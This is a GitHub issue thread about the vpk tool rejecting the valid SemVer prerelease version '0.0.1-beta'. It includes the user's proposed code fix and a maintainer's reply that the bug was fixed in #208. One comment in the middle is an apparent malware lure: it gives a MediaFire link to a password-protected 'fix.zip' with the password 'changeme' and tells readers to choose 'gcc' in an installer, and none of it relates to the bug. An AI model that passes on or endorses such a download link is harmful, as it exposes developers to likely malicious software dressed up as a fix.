### ISSUE TITLE
vpk fails with error “invalid package version”, even though the version is a valid SemVer version

### ISSUE THREAD

**Issue by mafra99** [velopack/velopack#207]
### OS

Windows 10.0.22631

### Programming Language

dotnet 8.0

### VPK Version

vpk 0.0.594

### Library Version

/

### What happened?

According to [semver.org](https://semver.org/) 0.0.1-beta is a valid version, if you use the version with Velopack, the command fails with the following error:

`-v contains an invalid package version '0.0.1-beta', it must be >= 0.0.1.`

Command for testing
`vpk pack --verbose -u MyApp -v 0.0.1-beta -p .\out\Client -e MyApp.exe -o ./out/tmp`

With version number 0.0.1 it works without problems

The error gets thrown [here](https://github.com/velopack/velopack/blob/develop/src/lib-csharp/NuGet/NugetUtil.cs#L44)

I think this line
`if (parsed < new SemanticVersion(0, 0, 1)) {`
should be changed to
`if (parsed < new SemanticVersion(0, 0, 1, parsed.Release)) {`

### Relevant log output

```shell
-v contains an invalid package version '0.0.1-beta', it must be >= 0.0.1.
```

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caesay** [comment]
Fixed in #208
